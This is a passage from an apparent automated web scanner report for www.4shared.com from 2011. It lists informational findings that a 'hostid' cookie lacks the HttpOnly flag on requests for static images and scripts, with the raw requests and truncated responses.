User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:00:20 GMT; Path=/
Set-Cookie: hostid=-480347017; Expires=Mon, 26-Jul-2021 14:00:20 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:00:20 GMT
ETag: W/"11939-1305634980000"
Last-Modified: Tue, 17 May 2011 12:23:00 GMT
Content-Type: image/jpeg
Content-Length: 11939
Date: Fri, 29 Jul 2011 14:00:19 GMT

......JFIF.....d.d......Ducky.......<.....&Adobe.d...........
..
E...^.. .................... ... .......

.

.......................................................................................
...[SNIP]...

6.130. http://www.4shared.com/images/mobile/screens/4mS_4.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/mobile/screens/4mS_4.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=739213679; Expires=Mon, 26-Jul-2021 14:00:21 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/mobile/screens/4mS_4.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:00:21 GMT; Path=/
Set-Cookie: hostid=739213679; Expires=Mon, 26-Jul-2021 14:00:21 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:00:21 GMT
ETag: W/"11916-1305634980000"
Last-Modified: Tue, 17 May 2011 12:23:00 GMT
Content-Type: image/jpeg
Content-Length: 11916
Date: Fri, 29 Jul 2011 14:00:20 GMT

......JFIF.....d.d......Ducky.......<.....&Adobe.d...........
..
G...... .................... ... .......

.

.......................................................................................
...[SNIP]...

6.131. http://www.4shared.com/images/mobile/square_4shared.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/mobile/square_4shared.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=269975739; Expires=Mon, 26-Jul-2021 14:00:20 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/mobile/square_4shared.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:00:20 GMT; Path=/
Set-Cookie: hostid=269975739; Expires=Mon, 26-Jul-2021 14:00:20 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:00:20 GMT
ETag: W/"5202-1311851860000"
Last-Modified: Thu, 28 Jul 2011 11:17:40 GMT
Content-Type: image/png
Content-Length: 5202
Date: Fri, 29 Jul 2011 14:00:19 GMT

.PNG
.
...IHDR...P...J......>D.....tEXtSoftware.Adobe ImageReadyq.e<....IDATx..\ .T..~....z.WW..t...=......\"z..Y...O..!fN...qr.I.9..M.h..`....YF..........i..............P...}...b.{....{...{..q.....
...[SNIP]...

6.132. http://www.4shared.com/images/mobile/symbian_mobile_new.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/mobile/symbian_mobile_new.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=-852109778; Expires=Mon, 26-Jul-2021 13:59:45 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/mobile/symbian_mobile_new.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:59:45 GMT; Path=/
Set-Cookie: hostid=-852109778; Expires=Mon, 26-Jul-2021 13:59:45 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 13:59:45 GMT
ETag: W/"82006-1305634980000"
Last-Modified: Tue, 17 May 2011 12:23:00 GMT
Content-Type: image/png
Content-Length: 82006
Date: Fri, 29 Jul 2011 13:59:44 GMT

.PNG
.
...IHDR.............._......tEXtSoftware.Adobe ImageReadyq.e<..?.IDATx.....dWy'...*..;...n..V@ .J. ,...&,,.....l..m.c{..=?.^.a.....f,c0x1A.$..ZY...._..o8.}.9.....^? ...Q.JU....|...#..>.....p.
...[SNIP]...

6.133. http://www.4shared.com/images/musImg2.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/musImg2.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=640133808; Expires=Mon, 26-Jul-2021 14:07:54 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/musImg2.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:07:54 GMT; Path=/
Set-Cookie: hostid=640133808; Expires=Mon, 26-Jul-2021 14:07:54 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:07:54 GMT
ETag: W/"918-1295256544000"
Last-Modified: Mon, 17 Jan 2011 09:29:04 GMT
Content-Type: image/jpeg
Content-Length: 918
Date: Fri, 29 Jul 2011 14:07:54 GMT

......JFIF.....d.d......Ducky.......<......Adobe.d.................... ... .......

.

...............................................................................................................
...[SNIP]...

6.134. http://www.4shared.com/images/musImg3.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/musImg3.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=651183055; Expires=Mon, 26-Jul-2021 14:08:01 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/musImg3.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:08:01 GMT; Path=/
Set-Cookie: hostid=651183055; Expires=Mon, 26-Jul-2021 14:08:01 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:08:01 GMT
ETag: W/"2780-1295256544000"
Last-Modified: Mon, 17 Jan 2011 09:29:04 GMT
Content-Type: image/jpeg
Content-Length: 2780
Date: Fri, 29 Jul 2011 14:08:01 GMT

......JFIF.....d.d......Ducky.......<......Adobe.d.................... ... .......

.

...............................................................................................................
...[SNIP]...

6.135. http://www.4shared.com/images/musImg4.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/musImg4.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=-1822653113; Expires=Mon, 26-Jul-2021 14:07:54 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/musImg4.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:07:54 GMT; Path=/
Set-Cookie: hostid=-1822653113; Expires=Mon, 26-Jul-2021 14:07:54 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:07:54 GMT
ETag: W/"18774-1295256544000"
Last-Modified: Mon, 17 Jan 2011 09:29:04 GMT
Content-Type: image/jpeg
Content-Length: 18774
Date: Fri, 29 Jul 2011 14:07:54 GMT

......JFIF.....d.d......Ducky.......<......Adobe.d.................... ... .......

.

...............................................................................................................
...[SNIP]...

6.136. http://www.4shared.com/images/musScr2.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/musScr2.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=1218369530; Expires=Mon, 26-Jul-2021 14:07:58 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/musScr2.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:07:58 GMT; Path=/
Set-Cookie: hostid=1218369530; Expires=Mon, 26-Jul-2021 14:07:58 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:07:58 GMT
ETag: W/"12835-1295256544000"
Last-Modified: Mon, 17 Jan 2011 09:29:04 GMT
Content-Type: image/gif
Content-Length: 12835
Date: Fri, 29 Jul 2011 14:07:58 GMT

GIF89a.........rsu...0-/pv.....x...............................ROq...XX[kn.k..u....p..b...`o....g.OXe............R_p....53ALX...................EDH...FD].....z...................|.......><P=Ht-I....`
...[SNIP]...

6.137. http://www.4shared.com/images/play.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/play.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=937360389; Expires=Mon, 26-Jul-2021 14:10:52 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/play.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:10:52 GMT; Path=/
Set-Cookie: hostid=937360389; Expires=Mon, 26-Jul-2021 14:10:52 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:10:52 GMT
ETag: W/"940-1295256544000"
Last-Modified: Mon, 17 Jan 2011 09:29:04 GMT
Content-Type: image/gif
Content-Length: 940
Date: Fri, 29 Jul 2011 14:10:51 GMT

GIF89a...................................................................ccb.............................................vvu.........^]\.........h.V...}}}...,.%....................................?./.
...[SNIP]...

6.138. http://www.4shared.com/images/resellerHead.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/resellerHead.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=-212655209; Expires=Mon, 26-Jul-2021 14:03:02 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/resellerHead.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:03:02 GMT; Path=/
Set-Cookie: hostid=-212655209; Expires=Mon, 26-Jul-2021 14:03:02 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:03:02 GMT
ETag: W/"148632-1296125992000"
Last-Modified: Thu, 27 Jan 2011 10:59:52 GMT
Content-Type: image/png
Content-Length: 148632
Date: Fri, 29 Jul 2011 14:03:02 GMT

.PNG
.
...IHDR...F...^......R......tEXtSoftware.Adobe ImageReadyq.e<..D:IDATx... .%.Y..E.......Y.YY..]U...[.-...l.: $...6..X.3..<..`3g...9x...I.h.....[.o..Y.../o_"..n.....>x......*_...F........y..z
...[SNIP]...

6.139. http://www.4shared.com/images/shad1.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/shad1.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=1519705480; Expires=Mon, 26-Jul-2021 14:09:55 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/shad1.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:09:55 GMT; Path=/
Set-Cookie: hostid=1519705480; Expires=Mon, 26-Jul-2021 14:09:55 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:09:55 GMT
ETag: W/"51-1295256544000"
Last-Modified: Mon, 17 Jan 2011 09:29:04 GMT
Content-Type: image/gif
Content-Length: 51
Date: Fri, 29 Jul 2011 14:09:55 GMT

GIF89a...................!.......,.............0..;

6.140. http://www.4shared.com/images/shad2.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/shad2.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=-1279688964; Expires=Mon, 26-Jul-2021 14:09:51 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/shad2.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:09:51 GMT; Path=/
Set-Cookie: hostid=-1279688964; Expires=Mon, 26-Jul-2021 14:09:51 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:09:51 GMT
ETag: W/"51-1295256544000"
Last-Modified: Mon, 17 Jan 2011 09:29:04 GMT
Content-Type: image/gif
Content-Length: 51
Date: Fri, 29 Jul 2011 14:09:51 GMT

GIF89a...................!.......,............"3..;

6.141. http://www.4shared.com/images/shad3.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/shad3.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=1167444018; Expires=Mon, 26-Jul-2021 14:09:53 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/shad3.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:09:53 GMT; Path=/
Set-Cookie: hostid=1167444018; Expires=Mon, 26-Jul-2021 14:09:53 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:09:53 GMT
ETag: W/"63-1295256544000"
Last-Modified: Mon, 17 Jan 2011 09:29:04 GMT
Content-Type: image/gif
Content-Length: 63
Date: Fri, 29 Jul 2011 14:09:52 GMT

GIF89a.......\a{fm.bh.V[sel..........!.......,...........H$0..;

6.142. http://www.4shared.com/images/shad4.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/shad4.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=212934130; Expires=Mon, 26-Jul-2021 14:09:53 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/shad4.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:09:53 GMT; Path=/
Set-Cookie: hostid=212934130; Expires=Mon, 26-Jul-2021 14:09:53 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:09:53 GMT
ETag: W/"63-1295256544000"
Last-Modified: Mon, 17 Jan 2011 09:29:04 GMT
Content-Type: image/gif
Content-Length: 63
Date: Fri, 29 Jul 2011 14:09:52 GMT

GIF89a.......\a{fm.bh.V[sel..........!.......,.............B..;

6.143. http://www.4shared.com/images/top.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/top.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=722792242; Expires=Mon, 26-Jul-2021 14:07:53 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/top.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:07:53 GMT; Path=/
Set-Cookie: hostid=722792242; Expires=Mon, 26-Jul-2021 14:07:53 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:07:53 GMT
ETag: W/"9445-1295256544000"
Last-Modified: Mon, 17 Jan 2011 09:29:04 GMT
Content-Type: image/jpeg
Content-Length: 9445
Date: Fri, 29 Jul 2011 14:07:53 GMT

......JFIF.....d.d......Ducky.......P......Adobe.d.....................................................

...................... .. . ........................................................D....
...[SNIP]...

6.144. http://www.4shared.com/images/topbg.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/topbg.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=1314752035; Expires=Mon, 26-Jul-2021 13:59:37 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/topbg.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:59:37 GMT; Path=/
Set-Cookie: hostid=1314752035; Expires=Mon, 26-Jul-2021 13:59:37 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 13:59:37 GMT
ETag: W/"267-1295256544000"
Last-Modified: Mon, 17 Jan 2011 09:29:04 GMT
Content-Type: image/gif
Content-Length: 267
Date: Fri, 29 Jul 2011 13:59:37 GMT

GIF89a..,.....wx{||lmpww{\\`uvypqtrsvqrvggkefiTUYopsXY]}~.WX\^_cz{~uuynor{|gikmnpz{}bdgaadhil~.xy|~~.|}.stwjkn....................................................................................
...[SNIP]...

6.145. http://www.4shared.com/images/vborders.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/vborders.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=-1869152100; Expires=Mon, 26-Jul-2021 14:08:01 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/vborders.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:08:01 GMT; Path=/
Set-Cookie: hostid=-1869152100; Expires=Mon, 26-Jul-2021 14:08:01 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:08:01 GMT
ETag: W/"212-1295256544000"
Last-Modified: Mon, 17 Jan 2011 09:29:04 GMT
Content-Type: image/gif
Content-Length: 212
Date: Fri, 29 Jul 2011 14:08:01 GMT

GIF89a.......~.......Z[]...NOSfgiqrt...el....z{}......mnpbh.\a{...fm.V[s...t{.qx.hn.di.mt...................!.......,..........Q`.0
.i(ZY......H1.N>.q/....`...>`p.$.....pX.......b{..).V0..^"..L$=...X
...[SNIP]...

6.146. http://www.4shared.com/js/Events.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/js/Events.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=-605073586; Expires=Mon, 26-Jul-2021 13:59:17 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/Events.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:59:17 GMT; Path=/
Set-Cookie: hostid=-605073586; Expires=Mon, 26-Jul-2021 13:59:17 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 13:59:17 GMT
ETag: W/"669-1311851860000"
Last-Modified: Thu, 28 Jul 2011 11:17:40 GMT
Content-Type: text/javascript
Content-Length: 669
Date: Fri, 29 Jul 2011 13:59:16 GMT

function Events() {
return this
}

Events._listeners = []

Events.addListener = function(event, listener) {
if (!Events._listeners[event])
Events._listeners[event] = []
Events._li
...[SNIP]...

6.147. http://www.4shared.com/js/homeScript.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/js/homeScript.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=-1156853492; Expires=Mon, 26-Jul-2021 14:10:53 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:10:53 GMT; Path=/
Set-Cookie: hostid=-1156853492; Expires=Mon, 26-Jul-2021 14:10:53 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:10:53 GMT
Vary: *
Content-Type: text/html;charset=UTF-8
Content-Length: 44840
Date: Fri, 29 Jul 2011 14:10:53 GMT

var i=1;
var ua = navigator.userAgent;
var opera = /opera [56789]|opera\/[56789]/i.test(ua);
var ie = !opera && /MSIE/.test(ua);
var ie50 = ie && /MSIE 5\.[
...[SNIP]...

6.148. http://www.4shared.com/js/jquery-1.4.4.min.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/js/jquery-1.4.4.min.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=-1031718777; Expires=Mon, 26-Jul-2021 13:59:32 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/jquery-1.4.4.min.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:59:32 GMT; Path=/
Set-Cookie: hostid=-1031718777; Expires=Mon, 26-Jul-2021 13:59:32 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 13:59:32 GMT
ETag: W/"78601-1295256544000"
Last-Modified: Mon, 17 Jan 2011 09:29:04 GMT
Content-Type: text/javascript
Content-Length: 78601
Date: Fri, 29 Jul 2011 13:59:32 GMT

/*!
* jQuery JavaScript Library v1.4.4
* http://jquery.com/
*
* Copyright 2010, John Resig
